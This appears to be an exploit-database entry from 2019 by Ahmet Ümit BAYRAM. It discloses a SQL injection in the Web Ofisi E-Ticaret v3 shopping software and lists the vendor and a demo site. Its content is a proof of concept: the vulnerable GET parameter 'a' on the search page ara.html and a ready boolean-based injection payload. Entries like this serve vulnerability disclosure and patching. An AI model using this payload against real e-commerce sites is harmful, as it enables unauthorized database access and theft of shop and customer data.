id: 33006
date: 07/19/2019
title: Web Ofisi E-Ticaret 3 - (a) SQL Injection Vunerability
author: Ahmet Ümit BAYRAM
cves: 

# Exploit Title: Web Ofisi E-Ticaret 3 - 'a' SQL Injection
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.web-ofisi.com/detay/e-ticaret-v3-sanal-pos.html
# Demo Site: http://demobul.net/eticaretv3/
# Version: v3
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/ara.html?a=
Vulnerable Parameter: a (GET)
Payload: e%' AND 3*2*1=6 AND '0002ZIf'!='0002ZIf%

#  0day.today [2023-03-22]  #